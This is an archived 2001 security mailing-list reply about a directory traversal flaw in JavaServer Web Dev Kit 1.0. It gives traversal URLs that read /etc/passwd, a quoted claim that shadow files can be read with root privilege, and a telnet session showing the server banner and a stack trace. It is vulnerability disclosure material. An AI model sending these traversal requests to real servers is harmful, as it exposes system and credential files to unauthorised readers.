Re: JWSDK *add-on

From: KF (dotslashat_private)
Date: Sun Aug 19 2001 - 23:09:20 PDT

Next message: skip: "Re: Multiple-Vendor-FTP-Vuln. (old?)"

Previous message: Mark Lastdrager: "security problem in surf-net ASP Discussion Forum < 2.30"
In reply to: Phuong Nguyen: "JWSDK *add-on"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I found this some months ago ... it was posted to packetstorm... the
moderators here let it slide for some reason. 
http://packetstormsecurity.org/0008-exploits/WDK_v1.0.vuln.txt

./ bugs in the Java Web server Development kit built in servlet engine

http://localhost:8080/../../../../etc/passwd

below is my version info.

JavaServer(tm) WDK v1.0 EA

[elguapo@localhost elguapo]$ telnet localhost 8080
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.0 500 Internal Server Error
Date: Fri, 25 Aug 2000 14:24:54 GMT
Server: JavaServer Web Dev Kit/1.0 EA with JSP/1.0 and Servlet/2.1
Content-Type: text/html
Servlet-Engine: JavaServer Web Dev Kit/1.0 EA (JSP 1.0; Servlet 2.1;
Java 1.3.0beta_refresh; Linux 2.2.15-4mdk i386; java.vendor=Sun
Microsystems Inc.)

<h1>Error: 500</h1>
<b>Internal Servlet Error:</b><br>
<pre>
java.lang.ClassCastException: javax.servlet.http.NoBodyResponse
        at
com.sun.web.core.RequestDispatcherImpl.forward(RequestDispatcherImpl.java:62)
at com.sun.web.core.DefaultServlet.processFile(DefaultServlet.java:126)
        at com.sun.web.core.DefaultServlet.doGet(DefaultServlet.java:69)

        at javax.servlet.http.HttpServlet.doHead(HttpServlet.java:286)
        at javax.servlet.http.HttpServlet.service(HttpServlet.java:744)
        at javax.servlet.http.HttpServlet.service(HttpServlet.java:840)
        at
com.sun.web.core.ServletWrapper.handleRequest(ServletWrapper.java:155)
        at com.sun.web.core.Context.handleRequest(Context.java:414)
        at
com.sun.web.server.ConnectionHandler.run(ConnectionHandler.java:139)
</pre>

Connection closed by foreign host.
[elguapo@localhost elguapo]$
-KF

Phuong Nguyen wrote:
> 
> Javaserver Web Dev Kit version 1.0 (JWSDK)
> 
> JWSDK directory traversal vulnerability is found by
> CHINANSL Security Advisory(CSA-200106), i want to add
> another thing, it's also vulnerable to other operating
> system like redhat 6.1 and this nasty bug allows you
> to browse and read any file with ROOT previledge , so
> you can read shadow file and stuff
> 
> http://localhost:8080/../examples//WEB-INF/../../../../../
> 
> __________________________________________________
> Do You Yahoo!?
> Make international calls for as low as $.04/minute with Yahoo! Messenger
> http://phonecard.yahoo.com/

Next message: skip: "Re: Multiple-Vendor-FTP-Vuln. (old?)"
Previous message: Mark Lastdrager: "security problem in surf-net ASP Discussion Forum < 2.30"
In reply to: Phuong Nguyen: "JWSDK *add-on"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Aug 20 2001 - 14:11:15 PDT